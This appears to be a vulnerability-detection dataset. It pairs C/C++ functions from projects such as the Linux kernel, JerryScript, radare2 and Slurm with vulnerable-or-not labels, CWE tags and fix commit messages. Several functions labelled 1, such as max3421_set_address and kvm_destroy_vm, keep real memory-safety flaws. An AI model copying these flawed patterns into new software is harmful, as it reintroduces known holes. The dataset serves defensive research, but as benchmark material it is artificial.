ce96fd6b0761d98353761bf78d5bfb55291179fd
16,752,974,408,008,992,000,000,000,000,000,000,000
78
- fix #39863, do not accept paths with NULL in them. See http://news.php.net/php.internals/50191, trunk will have the patch later (adding a macro and/or changing (some) APIs. Patch by Rasmus
main (void) { TEST_INIT (); const lit_utf8_byte_t *ptrs[test_sub_iters]; ecma_number_t numbers[test_sub_iters]; lit_utf8_byte_t strings[test_sub_iters][max_characters_in_string + 1]; lit_utf8_size_t lengths[test_sub_iters]; jmem_init (); for (uint32_t i = 0; i < test_iters; i++) { memset (numbers, 0, sizeof (ecma_number_t) * test_sub_iters); memset (lengths, 0, sizeof (lit_utf8_size_t) * test_sub_iters); memset (ptrs, 0, sizeof (lit_utf8_byte_t *) * test_sub_iters); for (uint32_t j = 0; j < test_sub_iters; j++) { int type = rand () % 3; if (type == 0) { lengths[j] = (lit_utf8_size_t) (rand () % max_characters_in_string + 1); generate_string (strings[j], lengths[j]); ecma_find_or_create_literal_string (strings[j], lengths[j]); strings[j][lengths[j]] = '\0'; ptrs[j] = strings[j]; TEST_ASSERT (ptrs[j]); } else if (type == 1) { lit_magic_string_id_t msi = (lit_magic_string_id_t) (rand () % LIT_NON_INTERNAL_MAGIC_STRING__COUNT); ptrs[j] = lit_get_magic_string_utf8 (msi); TEST_ASSERT (ptrs[j]); lengths[j] = (lit_utf8_size_t) lit_zt_utf8_string_size (ptrs[j]); ecma_find_or_create_literal_string (ptrs[j], lengths[j]); } else { ecma_number_t num = generate_number (); lengths[j] = ecma_number_to_utf8_string (num, strings[j], max_characters_in_string); ecma_find_or_create_literal_number (num); } } /* Add empty string. */ ecma_find_or_create_literal_string (NULL, 0); for (uint32_t j = 0; j < test_sub_iters; j++) { ecma_value_t lit1; ecma_value_t lit2; if (ptrs[j]) { lit1 = ecma_find_or_create_literal_string (ptrs[j], lengths[j]); lit2 = ecma_find_or_create_literal_string (ptrs[j], lengths[j]); TEST_ASSERT (ecma_is_value_string (lit1)); TEST_ASSERT (ecma_is_value_string (lit2)); TEST_ASSERT (lit1 == lit2); } else { lit1 = ecma_find_or_create_literal_number (numbers[j]); lit2 = ecma_find_or_create_literal_number (numbers[j]); TEST_ASSERT (ecma_is_value_number (lit1)); TEST_ASSERT (ecma_is_value_number (lit2)); TEST_ASSERT (lit1 == lit2); } } /* Check empty string exists. */ TEST_ASSERT (ecma_find_or_create_literal_string (NULL, 0) != JMEM_CP_NULL); } ecma_finalize_lit_storage (); jmem_finalize (); return 0; } /* main */
1
[ "CWE-416" ]
jerryscript
3bcd48f72d4af01d1304b754ef19fe1a02c96049
18,951,495,909,198,342,000,000,000,000,000,000,000
78
Improve parse_identifier (#4691) Ascii string length is no longer computed during string allocation. JerryScript-DCO-1.0-Signed-off-by: Daniel Batiz [email protected]
kvm_pfn_t gfn_to_pfn_memslot_atomic(struct kvm_memory_slot *slot, gfn_t gfn) { return __gfn_to_pfn_memslot(slot, gfn, true, NULL, true, NULL, NULL); }
0
[ "CWE-119" ]
linux
f8be156be163a052a067306417cd0ff679068c97
143,196,951,646,798,850,000,000,000,000,000,000,000
4
KVM: do not allow mapping valid but non-reference-counted pages It's possible to create a region which maps valid but non-refcounted pages (e.g., tail pages of non-compound higher order allocations). These host pages can then be returned by gfn_to_page, gfn_to_pfn, etc., family of APIs, which take a reference to the page, which takes it from 0 to 1. When the reference is dropped, this will free the page incorrectly. Fix this by only taking a reference on valid pages if it was non-zero, which indicates it is participating in normal refcounting (and can be released with put_page). This addresses CVE-2021-22543. Signed-off-by: Nicholas Piggin <[email protected]> Tested-by: Paolo Bonzini <[email protected]> Cc: [email protected] Signed-off-by: Paolo Bonzini <[email protected]>
R_API ut64 rbin_java_verification_info_calc_size(RBinJavaVerificationObj *se) { ut64 sz = 1; if (!se) { return 0; } // r_buf_read_at (bin->b, offset, (ut8*)(&se->tag), 1) switch (se->tag) { case R_BIN_JAVA_STACKMAP_OBJECT: // r_buf_read_at (bin->b, offset+1, (ut8*)buf, 2) sz += 2; break; case R_BIN_JAVA_STACKMAP_UNINIT: // r_buf_read_at (bin->b, offset+1, (ut8*)buf, 2) sz += 2; break; } return sz; }
0
[ "CWE-119", "CWE-788" ]
radare2
6c4428f018d385fc80a33ecddcb37becea685dd5
94,104,356,271,232,140,000,000,000,000,000,000,000
18
Improve boundary checks to fix oobread segfaults ##crash * Reported by Cen Zhang via huntr.dev * Reproducer: bins/fuzzed/javaoob-havoc.class
int __tcp_retransmit_skb(struct sock *sk, struct sk_buff *skb, int segs) { struct inet_connection_sock *icsk = inet_csk(sk); struct tcp_sock *tp = tcp_sk(sk); unsigned int cur_mss; int diff, len, err; /* Inconclusive MTU probe */ if (icsk->icsk_mtup.probe_size) icsk->icsk_mtup.probe_size = 0; /* Do not sent more than we queued. 1/4 is reserved for possible * copying overhead: fragmentation, tunneling, mangling etc. */ if (refcount_read(&sk->sk_wmem_alloc) > min_t(u32, sk->sk_wmem_queued + (sk->sk_wmem_queued >> 2), sk->sk_sndbuf)) return -EAGAIN; if (skb_still_in_host_queue(sk, skb)) return -EBUSY; if (before(TCP_SKB_CB(skb)->seq, tp->snd_una)) { if (before(TCP_SKB_CB(skb)->end_seq, tp->snd_una)) BUG(); if (tcp_trim_head(sk, skb, tp->snd_una - TCP_SKB_CB(skb)->seq)) return -ENOMEM; } if (inet_csk(sk)->icsk_af_ops->rebuild_header(sk)) return -EHOSTUNREACH; /* Routing failure or similar. */ cur_mss = tcp_current_mss(sk); /* If receiver has shrunk his window, and skb is out of * new window, do not retransmit it. The exception is the * case, when window is shrunk to zero. In this case * our retransmit serves as a zero window probe. */ if (!before(TCP_SKB_CB(skb)->seq, tcp_wnd_end(tp)) && TCP_SKB_CB(skb)->seq != tp->snd_una) return -EAGAIN; len = cur_mss * segs; if (skb->len > len) { if (tcp_fragment(sk, TCP_FRAG_IN_RTX_QUEUE, skb, len, cur_mss, GFP_ATOMIC)) return -ENOMEM; /* We'll try again later. */ } else { if (skb_unclone(skb, GFP_ATOMIC)) return -ENOMEM; diff = tcp_skb_pcount(skb); tcp_set_skb_tso_segs(skb, cur_mss); diff -= tcp_skb_pcount(skb); if (diff) tcp_adjust_pcount(sk, skb, diff); if (skb->len < cur_mss) tcp_retrans_try_collapse(sk, skb, cur_mss); } /* RFC3168, section 6.1.1.1. ECN fallback */ if ((TCP_SKB_CB(skb)->tcp_flags & TCPHDR_SYN_ECN) == TCPHDR_SYN_ECN) tcp_ecn_clear_syn(sk, skb); /* Update global and local TCP statistics. */ segs = tcp_skb_pcount(skb); TCP_ADD_STATS(sock_net(sk), TCP_MIB_RETRANSSEGS, segs); if (TCP_SKB_CB(skb)->tcp_flags & TCPHDR_SYN) __NET_INC_STATS(sock_net(sk), LINUX_MIB_TCPSYNRETRANS); tp->total_retrans += segs; /* make sure skb->data is aligned on arches that require it * and check if ack-trimming & collapsing extended the headroom * beyond what csum_start can cover. */ if (unlikely((NET_IP_ALIGN && ((unsigned long)skb->data & 3)) || skb_headroom(skb) >= 0xFFFF)) { struct sk_buff *nskb; tcp_skb_tsorted_save(skb) { nskb = __pskb_copy(skb, MAX_TCP_HEADER, GFP_ATOMIC); err = nskb ? tcp_transmit_skb(sk, nskb, 0, GFP_ATOMIC) : -ENOBUFS; } tcp_skb_tsorted_restore(skb); if (!err) { tcp_update_skb_after_send(tp, skb); tcp_rate_skb_sent(sk, skb); } } else { err = tcp_transmit_skb(sk, skb, 1, GFP_ATOMIC); } if (BPF_SOCK_OPS_TEST_FLAG(tp, BPF_SOCK_OPS_RETRANS_CB_FLAG)) tcp_call_bpf_3arg(sk, BPF_SOCK_OPS_RETRANS_CB, TCP_SKB_CB(skb)->seq, segs, err); if (likely(!err)) { TCP_SKB_CB(skb)->sacked |= TCPCB_EVER_RETRANS; trace_tcp_retransmit_skb(sk, skb); } else if (err != -EBUSY) { NET_INC_STATS(sock_net(sk), LINUX_MIB_TCPRETRANSFAIL); } return err; }
1
[ "CWE-416" ]
linux
7f582b248d0a86bae5788c548d7bb5bca6f7691a
114,213,026,118,832,340,000,000,000,000,000,000,000
107
tcp: purge write queue in tcp_connect_init() syzkaller found a reliable way to crash the host, hitting a BUG() in __tcp_retransmit_skb() Malicous MSG_FASTOPEN is the root cause. We need to purge write queue in tcp_connect_init() at the point we init snd_una/write_seq. This patch also replaces the BUG() by a less intrusive WARN_ON_ONCE() kernel BUG at net/ipv4/tcp_output.c:2837! invalid opcode: 0000 [#1] SMP KASAN Dumping ftrace buffer: (ftrace buffer empty) Modules linked in: CPU: 0 PID: 5276 Comm: syz-executor0 Not tainted 4.17.0-rc3+ #51 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011 RIP: 0010:__tcp_retransmit_skb+0x2992/0x2eb0 net/ipv4/tcp_output.c:2837 RSP: 0000:ffff8801dae06ff8 EFLAGS: 00010206 RAX: ffff8801b9fe61c0 RBX: 00000000ffc18a16 RCX: ffffffff864e1a49 RDX: 0000000000000100 RSI: ffffffff864e2e12 RDI: 0000000000000005 RBP: ffff8801dae073a0 R08: ffff8801b9fe61c0 R09: ffffed0039c40dd2 R10: ffffed0039c40dd2 R11: ffff8801ce206e93 R12: 00000000421eeaad R13: ffff8801ce206d4e R14: ffff8801ce206cc0 R15: ffff8801cd4f4a80 FS: 0000000000000000(0000) GS:ffff8801dae00000(0063) knlGS:00000000096bc900 CS: 0010 DS: 002b ES: 002b CR0: 0000000080050033 CR2: 0000000020000000 CR3: 00000001c47b6000 CR4: 00000000001406f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <IRQ> tcp_retransmit_skb+0x2e/0x250 net/ipv4/tcp_output.c:2923 tcp_retransmit_timer+0xc50/0x3060 net/ipv4/tcp_timer.c:488 tcp_write_timer_handler+0x339/0x960 net/ipv4/tcp_timer.c:573 tcp_write_timer+0x111/0x1d0 net/ipv4/tcp_timer.c:593 call_timer_fn+0x230/0x940 kernel/time/timer.c:1326 expire_timers kernel/time/timer.c:1363 [inline] __run_timers+0x79e/0xc50 kernel/time/timer.c:1666 run_timer_softirq+0x4c/0x70 kernel/time/timer.c:1692 __do_softirq+0x2e0/0xaf5 kernel/softirq.c:285 invoke_softirq kernel/softirq.c:365 [inline] irq_exit+0x1d1/0x200 kernel/softirq.c:405 exiting_irq arch/x86/include/asm/apic.h:525 [inline] smp_apic_timer_interrupt+0x17e/0x710 arch/x86/kernel/apic/apic.c:1052 apic_timer_interrupt+0xf/0x20 arch/x86/entry/entry_64.S:863 Fixes: cf60af03ca4e ("net-tcp: Fast Open client - sendmsg(MSG_FASTOPEN)") Signed-off-by: Eric Dumazet <[email protected]> Cc: Yuchung Cheng <[email protected]> Cc: Neal Cardwell <[email protected]> Reported-by: syzbot <[email protected]> Acked-by: Neal Cardwell <[email protected]> Signed-off-by: David S. Miller <[email protected]>
TEST_F(HttpConnectionManagerImplTest, TestDownstreamProtocolErrorAccessLog) { std::shared_ptr<AccessLog::MockInstance> handler(new NiceMock<AccessLog::MockInstance>()); access_logs_ = {handler}; setup(false, ""); EXPECT_CALL(*handler, log(_, _, _, _)) .WillOnce(Invoke([](const HeaderMap*, const HeaderMap*, const HeaderMap*, const StreamInfo::StreamInfo& stream_info) { EXPECT_FALSE(stream_info.responseCode()); EXPECT_TRUE(stream_info.hasAnyResponseFlag()); EXPECT_TRUE(stream_info.hasResponseFlag(StreamInfo::ResponseFlag::DownstreamProtocolError)); })); NiceMock<MockResponseEncoder> encoder; EXPECT_CALL(*codec_, dispatch(_)).WillRepeatedly(Invoke([&](Buffer::Instance&) -> Http::Status { conn_manager_->newStream(encoder); return codecProtocolError("protocol error"); })); Buffer::OwnedImpl fake_input("1234"); conn_manager_->onData(fake_input, false); }
0
[ "CWE-400" ]
envoy
0e49a495826ea9e29134c1bd54fdeb31a034f40c
246,129,513,393,889,130,000,000,000,000,000,000,000
22
http/2: add stats and stream flush timeout (#139) This commit adds a new stream flush timeout to guard against a remote server that does not open window once an entire stream has been buffered for flushing. Additional stats have also been added to better understand the codecs view of active streams as well as amount of data buffered. Signed-off-by: Matt Klein <[email protected]>
static const struct oid_to_string *get_oid_entry(const char *oid) { unsigned int i = 0; unsigned len = strlen(oid); do { if (len == _oid2str[i].oid_size && strcmp(_oid2str[i].oid, oid) == 0) return &_oid2str[i]; i++; } while (_oid2str[i].oid != NULL); return NULL; }
0
[]
gnutls
272854367efc130fbd4f1a51840d80c630214e12
261,287,808,942,391,000,000,000,000,000,000,000,000
15
Reset the output value on error in _gnutls_x509_dn_to_string() Reported by Kurt Roeckx.
AP_DECLARE(int) ap_setup_client_block(request_rec *r, int read_policy) { const char *tenc = apr_table_get(r->headers_in, "Transfer-Encoding"); const char *lenp = apr_table_get(r->headers_in, "Content-Length"); r->read_body = read_policy; r->read_chunked = 0; r->remaining = 0; if (tenc) { if (strcasecmp(tenc, "chunked")) { ap_log_rerror(APLOG_MARK, APLOG_INFO, 0, r, APLOGNO(01592) "Unknown Transfer-Encoding %s", tenc); return HTTP_NOT_IMPLEMENTED; } if (r->read_body == REQUEST_CHUNKED_ERROR) { ap_log_rerror(APLOG_MARK, APLOG_INFO, 0, r, APLOGNO(01593) "chunked Transfer-Encoding forbidden: %s", r->uri); return (lenp) ? HTTP_BAD_REQUEST : HTTP_LENGTH_REQUIRED; } r->read_chunked = 1; } else if (lenp) { char *endstr; if (apr_strtoff(&r->remaining, lenp, &endstr, 10) || *endstr || r->remaining < 0) { r->remaining = 0; ap_log_rerror(APLOG_MARK, APLOG_INFO, 0, r, APLOGNO(01594) "Invalid Content-Length"); return HTTP_BAD_REQUEST; } } if ((r->read_body == REQUEST_NO_BODY) && (r->read_chunked || (r->remaining > 0))) { ap_log_rerror(APLOG_MARK, APLOG_INFO, 0, r, APLOGNO(01595) "%s with body is not allowed for %s", r->method, r->uri); return HTTP_REQUEST_ENTITY_TOO_LARGE; } #ifdef AP_DEBUG { /* Make sure ap_getline() didn't leave any droppings. */ core_request_config *req_cfg = (core_request_config *)ap_get_core_module_config(r->request_config); AP_DEBUG_ASSERT(APR_BRIGADE_EMPTY(req_cfg->bb)); } #endif return OK; }
0
[ "CWE-20" ]
httpd
a6027e56924bb6227c1fdbf6f91e7e2438338be6
115,543,351,081,565,060,000,000,000,000,000,000,000
53
Limit accepted chunk-size to 2^63-1 and be strict about chunk-ext authorized characters. Submitted by: Yann Ylavic git-svn-id: https://svn.apache.org/repos/asf/httpd/httpd/trunk@1684513 13f79535-47bb-0310-9956-ffa450edef68
xrdp_mm_get_sesman_port(char* port, int port_bytes) { int fd; int error; int index; char* val; char cfg_file[256]; struct list* names; struct list* values; g_memset(cfg_file,0,sizeof(char) * 256); /* default to port 3350 */ g_strncpy(port, "3350", port_bytes - 1); /* see if port is in xrdp.ini file */ g_snprintf(cfg_file, 255, "%s/sesman.ini", XRDP_CFG_PATH); fd = g_file_open(cfg_file); if (fd > 0) { names = list_create(); names->auto_free = 1; values = list_create(); values->auto_free = 1; if (file_read_section(fd, "Globals", names, values) == 0) { for (index = 0; index < names->count; index++) { val = (char*)list_get_item(names, index); if (val != 0) { if (g_strcasecmp(val, "ListenPort") == 0) { val = (char*)list_get_item(values, index); error = g_atoi(val); if ((error > 0) && (error < 65000)) { g_strncpy(port, val, port_bytes - 1); } break; } } } } list_delete(names); list_delete(values); g_file_close(fd); } return 0; }
0
[]
xrdp
d8f9e8310dac362bb9578763d1024178f94f4ecc
301,111,312,089,159,700,000,000,000,000,000,000,000
49
move temp files from /tmp to /tmp/.xrdp
inline static void _slurm_rpc_dump_spank(slurm_msg_t * msg) { int rc = SLURM_SUCCESS; spank_env_request_msg_t *spank_req_msg = (spank_env_request_msg_t *) msg->data; spank_env_responce_msg_t *spank_resp_msg = NULL; /* Locks: read job */ slurmctld_lock_t job_read_lock = { NO_LOCK, READ_LOCK, NO_LOCK, NO_LOCK, NO_LOCK }; uid_t uid = g_slurm_auth_get_uid(msg->auth_cred, slurmctld_config.auth_info); slurm_msg_t response_msg; DEF_TIMERS; START_TIMER; debug("Processing RPC: REQUEST_SPANK_ENVIRONMENT from uid=%d JobId=%u", uid, spank_req_msg->job_id); if (!validate_slurm_user(uid)) { rc = ESLURM_USER_ID_MISSING; error("Security violation, REQUEST_SPANK_ENVIRONMENT RPC " "from uid=%d", uid); } if (rc == SLURM_SUCCESS) { /* do RPC call */ struct job_record *job_ptr; uint32_t i; lock_slurmctld(job_read_lock); job_ptr = find_job_record(spank_req_msg->job_id); if (job_ptr) { spank_resp_msg = xmalloc(sizeof(spank_env_responce_msg_t)); spank_resp_msg->spank_job_env_size = job_ptr->spank_job_env_size; spank_resp_msg->spank_job_env = xmalloc( spank_resp_msg->spank_job_env_size * sizeof(char *)); for (i = 0; i < spank_resp_msg->spank_job_env_size; i++) spank_resp_msg->spank_job_env[i] = xstrdup( job_ptr->spank_job_env[i]); } else { rc = ESLURM_INVALID_JOB_ID; } unlock_slurmctld(job_read_lock); } END_TIMER2("_slurm_rpc_dump_spank"); if (rc == SLURM_SUCCESS) { slurm_msg_t_init(&response_msg); response_msg.flags = msg->flags; response_msg.protocol_version = msg->protocol_version; response_msg.address = msg->address; response_msg.conn = msg->conn; response_msg.msg_type = RESPONCE_SPANK_ENVIRONMENT; response_msg.data = spank_resp_msg; slurm_send_node_msg(msg->conn_fd, &response_msg); slurm_free_spank_env_responce_msg(spank_resp_msg); } else { slurm_send_rc_msg(msg, rc); } }
0
[ "CWE-20" ]
slurm
033dc0d1d28b8d2ba1a5187f564a01c15187eb4e
101,653,514,173,867,360,000,000,000,000,000,000,000
62
Fix insecure handling of job requested gid. Only trust MUNGE signed values, unless the RPC was signed by SlurmUser or root. CVE-2018-10995.
set_directory_hook () { if (dircomplete_expand) { rl_directory_completion_hook = bash_directory_completion_hook; rl_directory_rewrite_hook = (rl_icppfunc_t *)0; } else { rl_directory_rewrite_hook = bash_directory_completion_hook; rl_directory_completion_hook = (rl_icppfunc_t *)0; } }
0
[ "CWE-20" ]
bash
4f747edc625815f449048579f6e65869914dd715
86,827,386,348,365,960,000,000,000,000,000,000,000
13
Bash-4.4 patch 7
int kernel_execve(const char *kernel_filename, const char *const *argv, const char *const *envp) { struct filename *filename; struct linux_binprm *bprm; int fd = AT_FDCWD; int retval; filename = getname_kernel(kernel_filename); if (IS_ERR(filename)) return PTR_ERR(filename); bprm = alloc_bprm(fd, filename); if (IS_ERR(bprm)) { retval = PTR_ERR(bprm); goto out_ret; } retval = count_strings_kernel(argv); if (retval < 0) goto out_free; bprm->argc = retval; retval = count_strings_kernel(envp); if (retval < 0) goto out_free; bprm->envc = retval; retval = bprm_stack_limits(bprm); if (retval < 0) goto out_free; retval = copy_string_kernel(bprm->filename, bprm); if (retval < 0) goto out_free; bprm->exec = bprm->p; retval = copy_strings_kernel(bprm->envc, envp, bprm); if (retval < 0) goto out_free; retval = copy_strings_kernel(bprm->argc, argv, bprm); if (retval < 0) goto out_free; retval = bprm_execve(bprm, fd, filename, 0); out_free: free_bprm(bprm); out_ret: putname(filename); return retval; }
0
[]
linux
0f2122045b946241a9e549c2a76cea54fa58a7ff
154,073,095,304,461,870,000,000,000,000,000,000,000
52
io_uring: don't rely on weak ->files references Grab actual references to the files_struct. To avoid circular references issues due to this, we add a per-task note that keeps track of what io_uring contexts a task has used. When the tasks execs or exits its assigned files, we cancel requests based on this tracking. With that, we can grab proper references to the files table, and no longer need to rely on stashing away ring_fd and ring_file to check if the ring_fd may have been closed. Cc: [email protected] # v5.5+ Reviewed-by: Pavel Begunkov <[email protected]> Signed-off-by: Jens Axboe <[email protected]>
get_mib_parse_error_count(void) { return erroneousMibs; }
0
[ "CWE-59", "CWE-61" ]
net-snmp
4fd9a450444a434a993bc72f7c3486ccce41f602
172,816,828,701,069,680,000,000,000,000,000,000,000
4
CHANGES: snmpd: Stop reading and writing the mib_indexes/* files Caching directory contents is something the operating system should do and is not something Net-SNMP should do. Instead of storing a copy of the directory contents in ${tmp_dir}/mib_indexes/${n}, always scan a MIB directory.
updateSelectOption(FormItemList *fi, FormSelectOptionItem *item) { int i; if (fi == NULL || item == NULL) return; for (i = 0; item != NULL; i++, item = item->next) { if (i == fi->selected) item->checked = TRUE; else item->checked = FALSE; } }
0
[ "CWE-119" ]
w3m
9f0bdcfdf061db3520bd1f112bdc5e83acdec4be
108,788,781,012,151,380,000,000,000,000,000,000,000
13
Prevent segfault for formUpdateBuffer Bug-Debian: https://github.com/tats/w3m/issues/9 Bug-Debian: https://github.com/tats/w3m/issues/10
static void hci_cc_write_page_scan_activity(struct hci_dev *hdev, struct sk_buff *skb) { u8 status = *((u8 *) skb->data); struct hci_cp_write_page_scan_activity *sent; BT_DBG("%s status 0x%2.2x", hdev->name, status); if (status) return; sent = hci_sent_cmd_data(hdev, HCI_OP_WRITE_PAGE_SCAN_ACTIVITY); if (!sent) return; hdev->page_scan_interval = __le16_to_cpu(sent->interval); hdev->page_scan_window = __le16_to_cpu(sent->window); }
0
[ "CWE-290" ]
linux
3ca44c16b0dcc764b641ee4ac226909f5c421aa3
283,116,893,238,049,500,000,000,000,000,000,000,000
18
Bluetooth: Consolidate encryption handling in hci_encrypt_cfm This makes hci_encrypt_cfm calls hci_connect_cfm in case the connection state is BT_CONFIG so callers don't have to check the state. Signed-off-by: Luiz Augusto von Dentz <[email protected]> Signed-off-by: Marcel Holtmann <[email protected]>
OperatorGet(const char *operatorName, Oid operatorNamespace, Oid leftObjectId, Oid rightObjectId, bool *defined) { HeapTuple tup; Oid operatorObjectId; tup = SearchSysCache4(OPERNAMENSP, PointerGetDatum(operatorName), ObjectIdGetDatum(leftObjectId), ObjectIdGetDatum(rightObjectId), ObjectIdGetDatum(operatorNamespace)); if (HeapTupleIsValid(tup)) { RegProcedure oprcode = ((Form_pg_operator) GETSTRUCT(tup))->oprcode; operatorObjectId = HeapTupleGetOid(tup); *defined = RegProcedureIsValid(oprcode); ReleaseSysCache(tup); } else { operatorObjectId = InvalidOid; *defined = false; } return operatorObjectId; }
0
[ "CWE-94" ]
postgres
f52d2fbd8c62f667191b61228acf9d8aa53607b9
328,191,291,806,812,740,000,000,000,000,000,000,000
30
In extensions, don't replace objects not belonging to the extension. Previously, if an extension script did CREATE OR REPLACE and there was an existing object not belonging to the extension, it would overwrite the object and adopt it into the extension. This is problematic, first because the overwrite is probably unintentional, and second because we didn't change the object's ownership. Thus a hostile user could create an object in advance of an expected CREATE EXTENSION command, and would then have ownership rights on an extension object, which could be modified for trojan-horse-type attacks. Hence, forbid CREATE OR REPLACE of an existing object unless it already belongs to the extension. (Note that we've always forbidden replacing an object that belongs to some other extension; only the behavior for previously-free-standing objects changes here.) For the same reason, also fail CREATE IF NOT EXISTS when there is an existing object that doesn't belong to the extension. Our thanks to Sven Klemm for reporting this problem. Security: CVE-2022-2625
int bnx2x_set_vlan_one(struct bnx2x *bp, u16 vlan, struct bnx2x_vlan_mac_obj *obj, bool set, unsigned long *ramrod_flags) { int rc; struct bnx2x_vlan_mac_ramrod_params ramrod_param; memset(&ramrod_param, 0, sizeof(ramrod_param)); /* Fill general parameters */ ramrod_param.vlan_mac_obj = obj; ramrod_param.ramrod_flags = *ramrod_flags; /* Fill a user request section if needed */ if (!test_bit(RAMROD_CONT, ramrod_flags)) { ramrod_param.user_req.u.vlan.vlan = vlan; /* Set the command: ADD or DEL */ if (set) ramrod_param.user_req.cmd = BNX2X_VLAN_MAC_ADD; else ramrod_param.user_req.cmd = BNX2X_VLAN_MAC_DEL; } rc = bnx2x_config_vlan_mac(bp, &ramrod_param); if (rc == -EEXIST) { /* Do not treat adding same vlan as error. */ DP(BNX2X_MSG_SP, "Failed to schedule ADD operations: %d\n", rc); rc = 0; } else if (rc < 0) { BNX2X_ERR("%s VLAN failed\n", (set ? "Set" : "Del")); } return rc; }
0
[ "CWE-20" ]
linux
8914a595110a6eca69a5e275b323f5d09e18f4f9
42,351,257,290,509,700,000,000,000,000,000,000,000
35
bnx2x: disable GSO where gso_size is too big for hardware If a bnx2x card is passed a GSO packet with a gso_size larger than ~9700 bytes, it will cause a firmware error that will bring the card down: bnx2x: [bnx2x_attn_int_deasserted3:4323(enP24p1s0f0)]MC assert! bnx2x: [bnx2x_mc_assert:720(enP24p1s0f0)]XSTORM_ASSERT_LIST_INDEX 0x2 bnx2x: [bnx2x_mc_assert:736(enP24p1s0f0)]XSTORM_ASSERT_INDEX 0x0 = 0x00000000 0x25e43e47 0x00463e01 0x00010052 bnx2x: [bnx2x_mc_assert:750(enP24p1s0f0)]Chip Revision: everest3, FW Version: 7_13_1 ... (dump of values continues) ... Detect when the mac length of a GSO packet is greater than the maximum packet size (9700 bytes) and disable GSO. Signed-off-by: Daniel Axtens <[email protected]> Reviewed-by: Eric Dumazet <[email protected]> Signed-off-by: David S. Miller <[email protected]>
static inline int decode_attr_length(struct xdr_stream *xdr, uint32_t *attrlen, __be32 **savep) { __be32 *p; READ_BUF(4); READ32(*attrlen); *savep = xdr->p; return 0; }
0
[ "CWE-703" ]
linux
dc0b027dfadfcb8a5504f7d8052754bf8d501ab9
241,714,726,768,788,880,000,000,000,000,000,000,000
9
NFSv4: Convert the open and close ops to use fmode Signed-off-by: Trond Myklebust <[email protected]>
max3421_set_address(struct usb_hcd *hcd, struct usb_device *dev, int epnum, int force_toggles) { struct max3421_hcd *max3421_hcd = hcd_to_max3421(hcd); int old_epnum, same_ep, rcvtog, sndtog; struct usb_device *old_dev; u8 hctl; old_dev = max3421_hcd->loaded_dev; old_epnum = max3421_hcd->loaded_epnum; same_ep = (dev == old_dev && epnum == old_epnum); if (same_ep && !force_toggles) return; if (old_dev && !same_ep) { /* save the old end-points toggles: */ u8 hrsl = spi_rd8(hcd, MAX3421_REG_HRSL); rcvtog = (hrsl >> MAX3421_HRSL_RCVTOGRD_BIT) & 1; sndtog = (hrsl >> MAX3421_HRSL_SNDTOGRD_BIT) & 1; /* no locking: HCD (i.e., we) own toggles, don't we? */ usb_settoggle(old_dev, old_epnum, 0, rcvtog); usb_settoggle(old_dev, old_epnum, 1, sndtog); } /* setup new endpoint's toggle bits: */ rcvtog = usb_gettoggle(dev, epnum, 0); sndtog = usb_gettoggle(dev, epnum, 1); hctl = (BIT(rcvtog + MAX3421_HCTL_RCVTOG0_BIT) | BIT(sndtog + MAX3421_HCTL_SNDTOG0_BIT)); max3421_hcd->loaded_epnum = epnum; spi_wr8(hcd, MAX3421_REG_HCTL, hctl); /* * Note: devnum for one and the same device can change during * address-assignment so it's best to just always load the * address whenever the end-point changed/was forced. */ max3421_hcd->loaded_dev = dev; spi_wr8(hcd, MAX3421_REG_PERADDR, dev->devnum); }
1
[ "CWE-416" ]
linux
b5fdf5c6e6bee35837e160c00ac89327bdad031b
164,445,247,275,147,700,000,000,000,000,000,000,000
43
usb: max-3421: Prevent corruption of freed memory The MAX-3421 USB driver remembers the state of the USB toggles for a device/endpoint. To save SPI writes, this was only done when a new device/endpoint was being used. Unfortunately, if the old device was removed, this would cause writes to freed memory. To fix this, a simpler scheme is used. The toggles are read from hardware when a URB is completed, and the toggles are always written to hardware when any URB transaction is started. This will cause a few more SPI transactions, but no causes kernel panics. Fixes: 2d53139f3162 ("Add support for using a MAX3421E chip as a host driver.") Cc: stable <[email protected]> Signed-off-by: Mark Tomlinson <[email protected]> Link: https://lore.kernel.org/r/[email protected] Signed-off-by: Greg Kroah-Hartman <[email protected]>
static void kvm_destroy_vm(struct kvm *kvm) { int i; struct mm_struct *mm = kvm->mm; kvm_destroy_pm_notifier(kvm); kvm_uevent_notify_change(KVM_EVENT_DESTROY_VM, kvm); kvm_destroy_vm_debugfs(kvm); kvm_arch_sync_events(kvm); mutex_lock(&kvm_lock); list_del(&kvm->vm_list); mutex_unlock(&kvm_lock); kvm_arch_pre_destroy_vm(kvm); kvm_free_irq_routing(kvm); for (i = 0; i < KVM_NR_BUSES; i++) { struct kvm_io_bus *bus = kvm_get_bus(kvm, i); if (bus) kvm_io_bus_destroy(bus); kvm->buses[i] = NULL; } kvm_coalesced_mmio_free(kvm); #if defined(CONFIG_MMU_NOTIFIER) && defined(KVM_ARCH_WANT_MMU_NOTIFIER) mmu_notifier_unregister(&kvm->mmu_notifier, kvm->mm); /* * At this point, pending calls to invalidate_range_start() * have completed but no more MMU notifiers will run, so * mn_active_invalidate_count may remain unbalanced. * No threads can be waiting in install_new_memslots as the * last reference on KVM has been dropped, but freeing * memslots would deadlock without this manual intervention. */ WARN_ON(rcuwait_active(&kvm->mn_memslots_update_rcuwait)); kvm->mn_active_invalidate_count = 0; #else kvm_arch_flush_shadow_all(kvm); #endif kvm_arch_destroy_vm(kvm); kvm_destroy_devices(kvm); for (i = 0; i < KVM_ADDRESS_SPACE_NUM; i++) { kvm_free_memslots(kvm, &kvm->__memslots[i][0]); kvm_free_memslots(kvm, &kvm->__memslots[i][1]); } cleanup_srcu_struct(&kvm->irq_srcu); cleanup_srcu_struct(&kvm->srcu); kvm_arch_free_vm(kvm); preempt_notifier_dec(); hardware_disable_all(); mmdrop(mm); module_put(kvm_chardev_ops.owner);
1
[ "CWE-459" ]
linux
683412ccf61294d727ead4a73d97397396e69a6b
135,302,587,656,361,500,000,000,000,000,000,000,000
52
